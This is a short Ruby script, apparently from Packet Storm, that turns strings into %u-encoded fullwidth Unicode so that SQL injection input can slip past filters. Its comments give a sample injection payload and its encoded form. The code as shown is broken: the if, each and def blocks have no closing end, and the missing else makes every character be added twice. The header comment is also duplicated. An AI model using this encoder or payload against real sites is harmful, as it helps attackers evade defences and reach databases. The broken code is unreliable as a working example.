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Unicode UTF-8 URL

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# Ruby Script to generate URL encoded Unicode UTF-8 URL.

# Author: Gary O'leary-Steele of Sec-1 Ltd

# Example:

# The string ' or 1 in (@@version)-- is encoded as and work for the same SQL injection attack

# %u02b9%u0020%uff4f%uff52%u0020%uff11%u0020%uff49%uff4e%u0020%uff08%u0040%u0040%uff56%uff45%uff52%uff53%uff49%uff4f%uff4e%uff09%uff0d%uff0d

# Ruby Script to generate URL encoded Unicode UTF-8 URL.
# Author: Gary O'leary-Steele of Sec-1 Ltd
# Example:
# The string ' or 1 in (@@version)-- is encoded as and work for the same SQL injection attack
# %u02b9%u0020%uff4f%uff52%u0020%uff11%u0020%uff49%uff4e%u0020%uff08%u0040%u0040%uff56%uff45%uff52%uff53%uff49%uff4f%uff4e%uff09%uff0d%uff0d

require 'uri'
def unicode_url(string)
lookuptable = Hash.new
lookuptable ={
' ' => '%u0020',
'/' => '%u2215',
'\\' => '%u2215',
"'" => '%u02b9',
'"' => '%u0022',
'>' => '%u003e',
'<' => '%u003c',
'#' => '%uff03',
'!' => '%uff01',
'$' => '%uff04',
'*' => '%uff0a',
'@' => '%u0040',
'.' => '%uff0e',
'_' => '%uff3f',
'(' => '%uff08',
')' => '%uff09',
',' => '%uff0c',
'%' => '%u0025',
'-' => '%uff0d',
';' => '%uff1b',
':' => '%uff1a',
'|' => '%uff5c',
'&' => '%uff06',
'+' => '%uff0b',
'=' => '%uff1d',
'a' => '%uff41',
'A' => '%uff21',
'b' => '%uff42',
'B' => '%uff22',
'c' => '%uff43',
'C' => '%uff23',
'd' => '%uff44',
'D' => '%uff24',
'e' => '%uff45',
'E' => '%uff25',
'f' => '%uff46',
'F' => '%uff26',
'g' => '%uff47',
'G' => '%uff27',
'h' => '%uff48',
'H' => '%uff28',
'i' => '%uff49',
'I' => '%uff29',
'j' => '%uff4a',
'J' => '%uff2a',
'k' => '%uff4b',
'K' => '%uff2b',
'l' => '%uff4c',
'L' => '%uff2c',
'm' => '%uff4d',
'M' => '%uff2d',
'n' => '%uff4e',
'N' => '%uff2e',
'o' => '%uff4f',
'O' => '%uff2f',
'p' => '%uff50',
'P' => '%uff30',
'q' => '%uff51',
'Q' => '%uff31',
'r' => '%uff52',
'R' => '%uff32',
's' => '%uff53',
'S' => '%uff33',
't' => '%uff54',
'T' => '%uff34',
'u' => '%uff55',
'U' => '%uff35',
'v' => '%uff56',
'V' => '%uff36',
'w' => '%uff57',
'W' => '%uff37',
'x' => '%uff58',
'X' => '%uff38',
'y' => '%uff59',
'Y' => '%uff39',
'z' => '%uff5a',
'Z' => '%uff3a',
'0' => '%uff10',
'1' => '%uff11',
'2' => '%uff12',
'3' => '%uff13',
'4' => '%uff14',
'5' => '%uff15',
'6' => '%uff16',
'7' => '%uff17',
'8' => '%uff18',
'9' => '%uff19'}

# Convert string to array of chars
chararray = string.scan(/./)
newstr = String.new
chararray.each do |c|
if lookuptable.has_key? c
newstr = newstr + lookuptable[c]
newstr = newstr + URI.escape(c)

return newstr

print "Enter string to URL Unicode:"
puts unicode_url(gets)

Download: unicode-fun.txt ? Packet Storm

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